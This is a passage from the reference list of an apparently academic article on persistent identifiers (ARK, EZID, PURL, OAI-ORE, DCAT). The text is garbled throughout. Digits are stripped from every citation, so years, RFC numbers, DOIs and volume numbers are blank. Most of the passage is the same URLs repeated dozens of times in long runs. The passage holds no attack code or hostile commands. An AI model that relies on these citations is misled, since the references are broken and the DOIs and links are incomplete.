identification. nucleic acids research (d ):d –d doi . /nar/gkr . klyne g, newman c. . rfc : date and time on the internet: timestamps. available at http: //www.ietf.org/rfc/rfc .txt. kunze j. . towards electronic persistence using ark identifiers. in: proceedings of the rd ecdl workshop on web archives. trondheim, norway, available at https://confluence.ucop.edu/ download/attachments/ /arkcdl.pdf. kunze j. . the ark identifier scheme at ten years old. in: workshop on metadata and persistent identifiers for social and economic data, berlin. available at http://www.slideshare.net/jakkbl/ the-ark-identifier-scheme-at-ten-years-old. kunze j, rodgers r. . the ark identifier scheme. technical report. internet engineering task force. available at https://tools.ietf.org/html/draft-kunze-ark- . kunze j, starr j. . ark (archival resource key) identifiers. available at http://www.cdlib.org/ inside/diglib/ark/arkcdl.pdf. lagoze c, van de sompel h. . compound information objects: the oai-ore perspective. open archives initiative – object reuse and exchange. available at http://www.openarchives. org/ore/documents/compoundobjects- .html. lagoze c, van de sompel h, johnston p, nelson m, sanderson r, warner s. . ore user guide—resource map discovery. available at http://www.openarchives.org/ore/ . /discovery. library of congress. . the relationship between urns, handles, and purls. available at http://memory.loc.gov/ammem/award/docs/purl-handle.html. mali f, erickson j, archer p. . data catalog vocabulary (dcat): w c recommendation january . available at http://www.w .org/tr/vocab-dcat/. maunsell jh. . unique identifiers for authors. the journal of neuroscience ( ): doi . /jneurosci. - . . moats r. . rfc : uniform resource name syntax. available at https://tools.ietf.org/html/ rfc . national center for biotechnology information. . available at http://jats.nlm.nih.gov/ publishing/tag-library/ . d /index.html. nottingham m. . rfc : web linking. available at https://www.ietf.org/rfc/rfc .txt. oclc. . purl help. available at https://purl.org/docs/help.html (accessed january ). parsons ma, duerr r, minster j-b. . data citation and peer review. available at http://dx.doi. org/ . / eo . peterson d, gao s, malhotra a, sperberg-mcqueen cm, thompson hs. . w c xml schema definition language (xsd) . part : datatypes: w c recommendation april . available at http://www.w .org/tr/xmlschema - /. peyrard s, kunze j, tramoni j-p. . the ark identifier scheme: lessons learnt at the bnf. in: proceedings of the international conference on dublin core and metadata applications . available at http://dcpapers.dublincore.org/pubs/article/view/ / . prinz f, schlange t, asadullah k. . believe it or not: how much can we rely on published data on potential drug targets? nature reviews drug discovery ( ): – doi . /nrd -c . starr et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://ezid.cdlib.org/ http://ezid.cdlib.org/ http://ezid.cdlib.org/ http://ezid.cdlib.org/ http://ezid.cdlib.org/ http://ezid.cdlib.org/ http://ezid.cdlib.org/ http://ezid.cdlib.org/ http://ezid.cdlib.org/ http://ezid.cdlib.org/ http://ezid.cdlib.org/ http://ezid.cdlib.org/ http://ezid.cdlib.org/ http://ezid.cdlib.org/ http://ezid.cdlib.org/ http://ezid.cdlib.org/ http://ezid.cdlib.org/ http://ezid.cdlib.org/ http://ezid.cdlib.org/ http://ezid.cdlib.org/ http://ezid.cdlib.org/ http://ezid.cdlib.org/ http://dx.doi.org/ . /nar/gkr http://www.ietf.org/rfc/rfc .txt http://www.ietf.org/rfc/rfc .txt http://www.ietf.org/rfc/rfc .txt http://www.ietf.org/rfc/rfc .txt http://www.ietf.org/rfc/rfc .txt http://www.ietf.org/rfc/rfc .txt http://www.ietf.org/rfc/rfc .txt http://www.ietf.org/rfc/rfc .txt http://www.ietf.org/rfc/rfc .txt http://www.ietf.org/rfc/rfc .txt http://www.ietf.org/rfc/rfc .txt http://www.ietf.org/rfc/rfc .txt http://www.ietf.org/rfc/rfc .txt http://www.ietf.org/rfc/rfc .txt http://www.ietf.org/rfc/rfc .txt http://www.ietf.org/rfc/rfc .txt http://www.ietf.org/rfc/rfc .txt http://www.ietf.org/rfc/rfc .txt http://www.ietf.org/rfc/rfc .txt http://www.ietf.org/rfc/rfc .txt http://www.ietf.org/rfc/rfc .txt http://www.ietf.org/rfc/rfc .txt http://www.ietf.org/rfc/rfc .txt http://www.ietf.org/rfc/rfc .txt http://www.ietf.org/rfc/rfc .txt http://www.ietf.org/rfc/rfc .txt http://www.ietf.org/rfc/rfc .txt http://www.ietf.org/rfc/rfc .txt http://www.ietf.org/rfc/rfc .txt http://www.ietf.org/rfc/rfc .txt http://www.ietf.org/rfc/rfc .txt http://www.ietf.org/rfc/rfc .txt http://www.ietf.org/rfc/rfc .txt http://www.ietf.org/rfc/rfc .txt http://www.ietf.org/rfc/rfc .txt https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf https://confluence.ucop.edu/download/attachments/ /arkcdl.pdf http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old https://tools.ietf.org/html/draft-kunze-ark- https://tools.ietf.org/html/draft-kunze-ark- https://tools.ietf.org/html/draft-kunze-ark- https://tools.ietf.org/html/draft-kunze-ark- https://tools.ietf.org/html/draft-kunze-ark- https://tools.ietf.org/html/draft-kunze-ark- https://tools.ietf.org/html/draft-kunze-ark- https://tools.ietf.org/html/draft-kunze-ark- https://tools.ietf.org/html/draft-kunze-ark- https://tools.ietf.org/html/draft-kunze-ark- https://tools.ietf.org/html/draft-kunze-ark- https://tools.ietf.org/html/draft-kunze-ark- https://tools.ietf.org/html/draft-kunze-ark- https://tools.ietf.org/html/draft-kunze-ark- https://tools.ietf.org/html/draft-kunze-ark- https://tools.ietf.org/html/draft-kunze-ark- https://tools.ietf.org/html/draft-kunze-ark- https://tools.ietf.org/html/draft-kunze-ark- https://tools.ietf.org/html/draft-kunze-ark- https://tools.ietf.org/html/draft-kunze-ark- https://tools.ietf.org/html/draft-kunze-ark- https://tools.ietf.org/html/draft-kunze-ark- https://tools.ietf.org/html/draft-kunze-ark- https://tools.ietf.org/html/draft-kunze-ark- https://tools.ietf.org/html/draft-kunze-ark- https://tools.ietf.org/html/draft-kunze-ark- https://tools.ietf.org/html/draft-kunze-ark- https://tools.ietf.org/html/draft-kunze-ark- https://tools.ietf.org/html/draft-kunze-ark- https://tools.ietf.org/html/draft-kunze-ark- https://tools.ietf.org/html/draft-kunze-ark- https://tools.ietf.org/html/draft-kunze-ark- https://tools.ietf.org/html/draft-kunze-ark- https://tools.ietf.org/html/draft-kunze-ark- https://tools.ietf.org/html/draft-kunze-ark- https://tools.ietf.org/html/draft-kunze-ark- https://tools.ietf.org/html/draft-kunze-ark- https://tools.ietf.org/html/draft-kunze-ark- https://tools.ietf.org/html/draft-kunze-ark- https://tools.ietf.org/html/draft-kunze-ark- https://tools.ietf.org/html/draft-kunze-ark- https://tools.ietf.org/html/draft-kunze-ark- https://tools.ietf.org/html/draft-kunze-ark- https://tools.ietf.org/html/draft-kunze-ark- https://tools.ietf.org/html/draft-kunze-ark- https://tools.ietf.org/html/draft-kunze-ark- http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/documents/compoundobjects- .html http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://www.openarchives.org/ore/ . /discovery http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://memory.loc.gov/ammem/award/docs/purl-handle.html http://www.w .org/tr/vocab-dcat/ http://www.w .org/tr/vocab-dcat/ http://www.w .org/tr/vocab-dcat/ http://www.w .org/tr/vocab-dcat/ http://www.w .org/tr/vocab-dcat/ http://www.w .org/tr/vocab-dcat/ http://www.w .org/tr/vocab-dcat/ http://www.w .org/tr/vocab-dcat/ http://www.w .org/tr/vocab-dcat/ http://www.w .org/tr/vocab-dcat/ http://www.w .org/tr/vocab-dcat/ http://www.w .org/tr/vocab-dcat/ http://www.w .org/tr/vocab-dcat/ http://www.w .org/tr/vocab-dcat/ http://www.w .org/tr/vocab-dcat/ http://www.w .org/tr/vocab-dcat/ http://www.w .org/tr/vocab-dcat/ http://www.w .org/tr/vocab-dcat/ http://www.w .org/tr/vocab-dcat/ http://www.w .org/tr/vocab-dcat/ http://www.w .org/tr/vocab-dcat/ http://www.w .org/tr/vocab-dcat/ http://www.w .org/tr/vocab-dcat/ http://www.w .org/tr/vocab-dcat/ http://www.w .org/tr/vocab-dcat/ http://www.w .org/tr/vocab-dcat/ http://www.w .org/tr/vocab-dcat/ http://www.w .org/tr/vocab-dcat/ http://www.w .org/tr/vocab-dcat/ http://www.w .org/tr/vocab-dcat/ http://www.w .org/tr/vocab-dcat/ http://www.w .org/tr/vocab-dcat/ http://dx.doi.org/ . /jneurosci. - . https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc 